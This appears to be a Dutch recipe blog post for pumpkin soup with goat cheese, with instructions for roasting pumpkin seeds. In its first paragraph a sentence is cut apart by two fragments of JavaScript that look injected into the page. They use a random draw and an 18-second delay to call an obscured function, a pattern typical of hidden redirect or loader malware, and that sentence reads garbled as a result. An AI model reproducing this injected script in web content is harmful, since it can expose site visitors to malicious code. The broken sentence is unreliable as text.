Wat een heerlijk kleurrijke seizoensgroente is de pompoen. Werkelijk waar elk kooktijdschrift dat ik open sloeg sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tond wel een gerecht met pompoen in. Een goede reden om ook zelf weer wat te experimenteren. Bij deze de zoveelste pompoensoep, maar dan wel mijn eigen variant met geitenkaas!
Pompoenpitten roosteren
Als je de pompoen zelf schoont maakt en niet voor een voorgesneden zak gaat kun je de pompoenpitten goed roosteren. Maak de pitten goed schoon in een zeef en zorg dat er zo weinig mogelijk vruchtvlees aan blijft plakken. Laat de pitten even drogen op wat keukenpapier en verwarm de oven voor op 200 graden. Je kunt de pitten nu in 20 minuten goudbruin roosteren. Heerlijk voor in de yoghurt of door een salade en makkelijk te bewaren in een afgesloten potje.
Serveertip
Soep is altijd lekker met een zelf gemaakt soepstengel, bekijk hier hoe je deze zelf kunt maken!

Geen Reacties op "Pompoensoep met geitenkaas"